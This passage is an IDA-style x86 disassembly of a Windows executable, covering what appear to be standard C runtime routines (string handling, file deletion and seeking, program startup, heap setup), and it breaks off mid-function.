; Attributes: bp-based frame
sub_417900 proc near ; CODE XREF: sub_407BA3+FA�p
; sub_4087B3+3E6D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4158E0
cmp eax, 1
pop ecx
jb short loc_41793B
cmp byte ptr [ebx+1], 3Ah
jnz short loc_41793B
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_417937
push 2
push ebx
push esi
call sub_41CAD5
add esp, 0Ch
and byte ptr [esi+2], 0
loc_417937: ; CODE XREF: sub_417900+25�j
inc ebx
inc ebx
jmp short loc_417945
; ---------------------------------------------------------------------------
loc_41793B: ; CODE XREF: sub_417900+18�j
; sub_417900+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_417945
and byte ptr [eax], 0
loc_417945: ; CODE XREF: sub_417900+39�j
; sub_417900+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_4179BD
loc_417958: ; CODE XREF: sub_417900+87�j
mov cl, [eax]
movzx edx, cl
test byte_494141[edx], 4
jz short loc_417969
inc eax
jmp short loc_417983
; ---------------------------------------------------------------------------
loc_417969: ; CODE XREF: sub_417900+64�j
cmp cl, 2Fh
jz short loc_41797D
cmp cl, 5Ch
jz short loc_41797D
cmp cl, 2Eh
jnz short loc_417983
mov [ebp+var_4], eax
jmp short loc_417983
; ---------------------------------------------------------------------------
loc_41797D: ; CODE XREF: sub_417900+6C�j
; sub_417900+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_417983: ; CODE XREF: sub_417900+67�j
; sub_417900+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_417958
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_4179BD
cmp [ebp+arg_8], 0
jz short loc_4179B8
sub edi, ebx
cmp edi, esi
jb short loc_4179A1
mov edi, esi
loc_4179A1: ; CODE XREF: sub_417900+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41CAD5
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4179B8: ; CODE XREF: sub_417900+97�j
mov ebx, [ebp+arg_4]
jmp short loc_4179C7
; ---------------------------------------------------------------------------
loc_4179BD: ; CODE XREF: sub_417900+56�j
; sub_417900+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_4179C7
and byte ptr [ecx], 0
loc_4179C7: ; CODE XREF: sub_417900+BB�j
; sub_417900+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_417A1A
cmp edi, ebx
jb short loc_417A1A
cmp [ebp+arg_C], 0
jz short loc_4179F7
sub edi, ebx
cmp edi, esi
jb short loc_4179E0
mov edi, esi
loc_4179E0: ; CODE XREF: sub_417900+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41CAD5
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4179F7: ; CODE XREF: sub_417900+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_417A42
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_417A07
mov esi, eax
loc_417A07: ; CODE XREF: sub_417900+103�j
push esi
push [ebp+var_4]
push edi
call sub_41CAD5
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_417A42
; ---------------------------------------------------------------------------
loc_417A1A: ; CODE XREF: sub_417900+CC�j
; sub_417900+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_417A38
sub eax, ebx
cmp eax, esi
jnb short loc_417A29
mov esi, eax
loc_417A29: ; CODE XREF: sub_417900+125�j
push esi
push ebx
push edi
call sub_41CAD5
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_417A38: ; CODE XREF: sub_417900+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_417A42
and byte ptr [eax], 0
loc_417A42: ; CODE XREF: sub_417900+FC�j
; sub_417900+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A47 proc near ; CODE XREF: sub_4087B3+341E�p
; sub_4087B3+344D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_417A5B
xor eax, eax
jmp short loc_417A91
; ---------------------------------------------------------------------------
loc_417A5B: ; CODE XREF: sub_417A47+E�j
dec [ebp+arg_4]
push esi
jz short loc_417A8B
mov esi, [ebp+arg_8]
loc_417A64: ; CODE XREF: sub_417A47+42�j
dec dword ptr [esi+4]
js short loc_417A73
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_417A7A
; ---------------------------------------------------------------------------
loc_417A73: ; CODE XREF: sub_417A47+20�j
push esi
call sub_41C031
pop ecx
loc_417A7A: ; CODE XREF: sub_417A47+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_417A95
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_417A8B
dec [ebp+arg_4]
jnz short loc_417A64
loc_417A8B: ; CODE XREF: sub_417A47+18�j
; sub_417A47+3D�j ...
and byte ptr [edi], 0
loc_417A8E: ; CODE XREF: sub_417A47+55�j
mov eax, ebx
pop esi
loc_417A91: ; CODE XREF: sub_417A47+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_417A95: ; CODE XREF: sub_417A47+36�j
cmp edi, [ebp+arg_0]
jnz short loc_417A8B
xor ebx, ebx
jmp short loc_417A8E
sub_417A47 endp
; =============== S U B R O U T I N E =======================================
sub_417A9E proc near ; CODE XREF: sub_4087B3+20C1�p
; .text:00417ACC�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_495394 ; DeleteFileA
test eax, eax
jnz short loc_417AB4
call ds:dword_495328 ; RtlGetLastWin32Error
jmp short loc_417AB6
; ---------------------------------------------------------------------------
loc_417AB4: ; CODE XREF: sub_417A9E+C�j
xor eax, eax
loc_417AB6: ; CODE XREF: sub_417A9E+14�j
test eax, eax
jz short loc_417AC5
push eax
call sub_41C4E8
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417AC5: ; CODE XREF: sub_417A9E+1A�j
xor eax, eax
retn
sub_417A9E endp
; ---------------------------------------------------------------------------
push dword ptr [esp+4]
call sub_417A9E
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417AD3 proc near ; CODE XREF: sub_4087B3+2018�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_41CB5F
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41AAED
push [ebp+arg_0]
mov edi, eax
push esi
call sub_41CBEC
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_417AD3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B10 proc near ; CODE XREF: sub_4087B3+7F3�p
; sub_4145E8+2AC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_417B41
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_417B3F
jz short loc_417B41
dec ecx
dec ecx
loc_417B3F: ; CODE XREF: sub_417B10+29�j
not ecx
loc_417B41: ; CODE XREF: sub_417B10+9�j
; sub_417B10+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_417B10 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_417B60
loc_417B50: ; CODE XREF: sub_417B60+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_417B60
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417B60 proc near ; CODE XREF: sub_4087B3+411�p
; sub_4087B3+4C0�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00417B50 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_417B66: ; CODE XREF: sub_417760+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_417B8B
loc_417B78: ; CODE XREF: sub_417B60+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_417B50
test cl, cl
jz short loc_417BD4
test edx, 3
jnz short loc_417B78
loc_417B8B: ; CODE XREF: sub_417B60+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_417B96: ; CODE XREF: sub_417B60+61�j
; sub_417B60+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_417BD8
and eax, 81010100h
jz short loc_417B96
and eax, 1010100h
jnz short loc_417BD2
and esi, 80000000h
jnz short loc_417B96
loc_417BD2: ; CODE XREF: sub_417B60+68�j
; sub_417B60+81�j ...
pop esi
pop edi
loc_417BD4: ; CODE XREF: sub_417B60+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_417BD8: ; CODE XREF: sub_417B60+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_417C15
test al, al
jz short loc_417BD2
cmp ah, bl
jz short loc_417C0E
test ah, ah
jz short loc_417BD2
shr eax, 10h
cmp al, bl
jz short loc_417C07
test al, al
jz short loc_417BD2
cmp ah, bl
jz short loc_417C00
test ah, ah
jz short loc_417BD2
jmp short loc_417B96
; ---------------------------------------------------------------------------
loc_417C00: ; CODE XREF: sub_417B60+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417C07: ; CODE XREF: sub_417B60+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417C0E: ; CODE XREF: sub_417B60+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417C15: ; CODE XREF: sub_417B60+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_417B60 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
add eax, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C24 proc near ; CODE XREF: sub_40FB1A+6�p
; sub_40FB3F+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_49288C, 0
push ebx
push esi
push edi
jnz short loc_417C51
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_417CEA
cmp eax, 5Ah
jg loc_417CEA
add eax, 20h
jmp loc_417CEA
; ---------------------------------------------------------------------------
loc_417C51: ; CODE XREF: sub_417C24+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_417C85
cmp dword_435E38, esi
jle short loc_417C73
push esi
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_417C7D
; ---------------------------------------------------------------------------
loc_417C73: ; CODE XREF: sub_417C24+42�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, esi
loc_417C7D: ; CODE XREF: sub_417C24+4D�j
test eax, eax
jnz short loc_417C85
loc_417C81: ; CODE XREF: sub_417C24+AD�j
mov eax, ebx
jmp short loc_417CEA
; ---------------------------------------------------------------------------
loc_417C85: ; CODE XREF: sub_417C24+3A�j
; sub_417C24+5B�j
mov edx, off_435C2C
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417CA9
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_417CB2
; ---------------------------------------------------------------------------
loc_417CA9: ; CODE XREF: sub_417C24+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_417CB2: ; CODE XREF: sub_417C24+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_49288C
call sub_41CC29
add esp, 20h
test eax, eax
jz short loc_417C81
cmp eax, esi
jnz short loc_417CDD
movzx eax, [ebp+var_4]
jmp short loc_417CEA
; ---------------------------------------------------------------------------
loc_417CDD: ; CODE XREF: sub_417C24+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_417CEA: ; CODE XREF: sub_417C24+16�j
; sub_417C24+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417C24 endp
; =============== S U B R O U T I N E =======================================
sub_417CEF proc near ; CODE XREF: sub_4113B6+55�p
; sub_412976+236�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_417D06
loc_417CFC: ; CODE XREF: sub_417CEF+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_417CFC
loc_417D06: ; CODE XREF: sub_417CEF+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_417CEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D0C proc near ; CODE XREF: sub_4113B6+19�p
; sub_4113B6+49�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_417DD9
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_417E06
cmp dword_49288C, esi
jnz short loc_417D5D
cmp edi, esi
jbe loc_417E06
loc_417D3C: ; CODE XREF: sub_417D0C+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_417E06
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_417D3C
jmp loc_417E06
; ---------------------------------------------------------------------------
loc_417D5D: ; CODE XREF: sub_417D0C+26�j
mov ebx, [ebp+arg_4]
mov esi, ds:dword_4953EC
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_49289C
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_417E05
call ds:dword_495328 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_417D97
loc_417D88: ; CODE XREF: sub_417D0C+CB�j
; sub_417D0C+F7�j
mov dword_4927F4, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_417E06
; ---------------------------------------------------------------------------
loc_417D97: ; CODE XREF: sub_417D0C+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_417D9F: ; CODE XREF: sub_417D0C+B3�j
mov cl, [eax]
test cl, cl
jz short loc_417DC1
mov edx, off_435C2C
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417DB6
inc eax
loc_417DB6: ; CODE XREF: sub_417D0C+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_417D9F
loc_417DC1: ; CODE XREF: sub_417D0C+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_49289C
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_417E06
jmp short loc_417D88
; ---------------------------------------------------------------------------
loc_417DD9: ; CODE XREF: sub_417D0C+F�j
cmp dword_49288C, esi
jnz short loc_417DEC
push [ebp+arg_4]
call sub_4158E0
pop ecx
jmp short loc_417E06
; ---------------------------------------------------------------------------
loc_417DEC: ; CODE XREF: sub_417D0C+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_49289C
call ds:dword_4953EC ; MultiByteToWideChar
cmp eax, esi
jz short loc_417D88
loc_417E05: ; CODE XREF: sub_417D0C+6B�j
dec eax
loc_417E06: ; CODE XREF: sub_417D0C+1A�j
; sub_417D0C+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_417D0C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417E10 proc near ; CODE XREF: sub_413B9E+11B�p
; .text:00416D61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_417E29
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_417E29: ; CODE XREF: sub_417E10+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_417E10 endp
; =============== S U B R O U T I N E =======================================
sub_417E44 proc near ; CODE XREF: sub_4145E8+2E2�p
; sub_4145E8+435�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_417EC0
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_417E63
cmp edi, 1
jz short loc_417E63
cmp edi, 2
jnz short loc_417EC0
loc_417E63: ; CODE XREF: sub_417E44+13�j
; sub_417E44+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_417E7A
push esi
call sub_41CF12
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_417E7A: ; CODE XREF: sub_417E44+27�j
push esi
call sub_41BF5F
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_417E8F
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_417EA3
; ---------------------------------------------------------------------------
loc_417E8F: ; CODE XREF: sub_417E44+42�j
test al, 1
jz short loc_417EA3
test al, 8
jz short loc_417EA3
test ah, 4
jnz short loc_417EA3
mov dword ptr [esi+18h], 200h
loc_417EA3: ; CODE XREF: sub_417E44+49�j
; sub_417E44+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41CE78
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_417ECD
; ---------------------------------------------------------------------------
loc_417EC0: ; CODE XREF: sub_417E44+B�j
; sub_417E44+1D�j
mov dword_4927F4, 16h
or eax, 0FFFFFFFFh
loc_417ECD: ; CODE XREF: sub_417E44+7A�j
pop edi
pop esi
retn
sub_417E44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417ED0 proc near ; DATA XREF: .nPack:off_496E00�o
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4275E8
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call ds:dword_495448 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_49280C, edx
mov ecx, eax
and ecx, 0FFh
mov dword_492808, ecx
shl ecx, 8
add ecx, edx
mov dword_492804, ecx
shr eax, 10h
mov dword_492800, eax
xor esi, esi
push esi
call sub_41820B
pop ecx
test eax, eax
jnz short loc_417F3C
push 1Ch
call sub_417FEB
pop ecx
loc_417F3C: ; CODE XREF: sub_417ED0+62�j
mov [ebp+var_4], esi
call sub_41D67E
call ds:dword_495444 ; GetCommandLineA
mov dword_494278, eax
call sub_41D54C
mov dword_492840, eax
call sub_41D2FF
call sub_41D246
call sub_4177E0
mov [ebp+var_30], esi
lea eax, [ebp+var_5C]
push eax
call ds:dword_495440 ; GetStartupInfoA
call sub_41D1EE
mov [ebp+var_64], eax
test byte ptr [ebp+var_30], 1
jz short loc_417F89
movzx eax, [ebp+var_2C]
jmp short loc_417F8C
; ---------------------------------------------------------------------------
loc_417F89: ; CODE XREF: sub_417ED0+B1�j
push 0Ah
pop eax
loc_417F8C: ; CODE XREF: sub_417ED0+B7�j
push eax
push [ebp+var_64]
push esi
push esi
call ds:dword_4953A8 ; GetModuleHandleA
push eax
call sub_4012D0
mov [ebp+var_60], eax
push eax
call sub_41780D
mov eax, [ebp+var_14]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp+var_68], ecx
push eax
push ecx
call sub_41D06A
pop ecx
pop ecx
retn
sub_417ED0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_41781E
; =============== S U B R O U T I N E =======================================
sub_417FC6 proc near ; CODE XREF: sub_4167F2+16�p
; sub_41D246+4E�p ...
arg_0 = dword ptr 4
cmp dword_492848, 1
jnz short loc_417FD4
call sub_41D92C
loc_417FD4: ; CODE XREF: sub_417FC6+7�j
push [esp+arg_0]
call sub_41D965
push 0FFh
call off_435AA0
pop ecx
pop ecx
retn
sub_417FC6 endp
; =============== S U B R O U T I N E =======================================
sub_417FEB proc near ; CODE XREF: sub_417ED0+66�p
arg_0 = dword ptr 4
cmp dword_492848, 1
jnz short loc_417FF9
call sub_41D92C
loc_417FF9: ; CODE XREF: sub_417FEB+7�j
push [esp+arg_0]
call sub_41D965
pop ecx
push 0FFh
call ds:dword_495350 ; ExitProcess
retn
sub_417FEB endp
; ---------------------------------------------------------------------------
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_4275F8
retn
; =============== S U B R O U T I N E =======================================
sub_418020 proc near ; DATA XREF: .rdata:off_4275F8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4180E2
test [esp+4+arg_0], 1
jz short loc_418036
push esi
call sub_4158CA
pop ecx
loc_418036: ; CODE XREF: sub_418020+D�j
mov eax, esi
pop esi
retn 4
sub_418020 endp
; =============== S U B R O U T I N E =======================================
sub_41803C proc near ; CODE XREF: sub_4155CD+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_4275F8
push dword ptr [edi]
call sub_4158E0
inc eax
push eax
call sub_416765
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_41806B
push dword ptr [edi]
push eax
call sub_4175D0
pop ecx
pop ecx
loc_41806B: ; CODE XREF: sub_41803C+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_41803C endp
; =============== S U B R O U T I N E =======================================
sub_418079 proc near ; CODE XREF: sub_4156B4+17�p
; .text:004180D7�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_4275F8
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_4180B6
push dword ptr [edi+4]
call sub_4158E0
inc eax
push eax
call sub_416765
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_4180BC
push dword ptr [edi+4]
push eax
call sub_4175D0
pop ecx
pop ecx
jmp short loc_4180BC
; ---------------------------------------------------------------------------
loc_4180B6: ; CODE XREF: sub_418079+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_4180BC: ; CODE XREF: sub_418079+2E�j
; sub_418079+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_418079 endp
; ---------------------------------------------------------------------------
push esi
mov esi, ecx
cmp esi, [esp+8]
jz short loc_4180DC
call sub_4180E2
push dword ptr [esp+8]
mov ecx, esi
call sub_418079
loc_4180DC: ; CODE XREF: .text:004180CA�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4180E2 proc near ; CODE XREF: sub_41565B+2B�p
; sub_415711+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_4275F8
jz short locret_4180F7
push dword ptr [ecx+4]
call sub_4158CA
pop ecx
locret_4180F7: ; CODE XREF: sub_4180E2+A�j
retn
sub_4180E2 endp
; =============== S U B R O U T I N E =======================================
sub_4180F8 proc near ; DATA XREF: .rdata:004275FC�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_418104
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_418104: ; CODE XREF: sub_4180F8+5�j
retn
sub_4180F8 endp
; =============== S U B R O U T I N E =======================================
sub_418105 proc near ; CODE XREF: sub_41811A+3�p
mov dword ptr [ecx], offset off_427618
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_418119
push ecx
call sub_415D6C
pop ecx
locret_418119: ; CODE XREF: sub_418105+B�j
retn
sub_418105 endp
; =============== S U B R O U T I N E =======================================
sub_41811A proc near ; DATA XREF: .rdata:off_427618�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_418105
test [esp+4+arg_0], 1
jz short loc_418130
push esi
call sub_4158CA
pop ecx
loc_418130: ; CODE XREF: sub_41811A+D�j
mov eax, esi
pop esi
retn 4
sub_41811A endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
add ecx, 9
add eax, 9
push ecx
push eax
call sub_416B70
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
; ---------------------------------------------------------------------------
mov eax, [esp+4]
add ecx, 9
add eax, 9
push ecx
push eax
call sub_416B70
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
retn 4
; ---------------------------------------------------------------------------
mov eax, [esp+4]
add ecx, 9
add eax, 9
push ecx
push eax
call sub_416B70
pop ecx
pop ecx
xor ecx, ecx
test eax, eax
setnle cl
mov eax, ecx
retn 4
; ---------------------------------------------------------------------------
lea eax, [ecx+8]
retn
; ---------------------------------------------------------------------------
mov eax, ecx
mov dword ptr [eax], offset off_427618
retn 4
; ---------------------------------------------------------------------------
mov eax, ecx
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181A0 proc near ; CODE XREF: sub_415573+54�p
; sub_41563E+18�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_427620
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_49544C ; RaiseException
pop edi
pop esi
leave
retn 8
sub_4181A0 endp
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_492850
mov dword_492850, ecx
retn
; ---------------------------------------------------------------------------
mov eax, dword_492850
retn
; =============== S U B R O U T I N E =======================================
sub_4181F0 proc near ; CODE XREF: sub_415D0A+1F�p
; sub_416ED2+106�p ...
arg_0 = dword ptr 4
mov eax, dword_492850
test eax, eax
jz short loc_418208
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_418208
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_418208: ; CODE XREF: sub_4181F0+7�j
; sub_4181F0+12�j
xor eax, eax
retn
sub_4181F0 endp
; =============== S U B R O U T I N E =======================================
sub_41820B proc near ; CODE XREF: sub_417ED0+5A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_495454 ; HeapCreate
test eax, eax
mov dword_49426C, eax
jz short loc_418240
call sub_4182D9
test eax, eax
jnz short loc_418243
push dword_49426C
call ds:dword_495450 ; HeapDestroy
loc_418240: ; CODE XREF: sub_41820B+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_418243: ; CODE XREF: sub_41820B+27�j
push 1
pop eax
retn
sub_41820B endp
; ---------------------------------------------------------------------------
push ebx
xor ebx, ebx
cmp dword_494264, ebx
push ebp
mov ebp, ds:dword_49542C
jle short loc_41829D
mov eax, dword_494268
push esi
push edi
mov edi, ds:dword_495458
lea esi, [eax+0Ch]
loc_418269: ; CODE XREF: .text:00418299�j
push 4000h
push 100000h
push dword ptr [esi]
call edi ; VirtualFree
push 8000h
push 0
push dword ptr [esi]
call edi ; VirtualFree
push dword ptr [esi+4]
push 0
push dword_49426C
call ebp ; RtlFreeHeap
add esi, 14h
inc ebx
cmp ebx, dword_494264
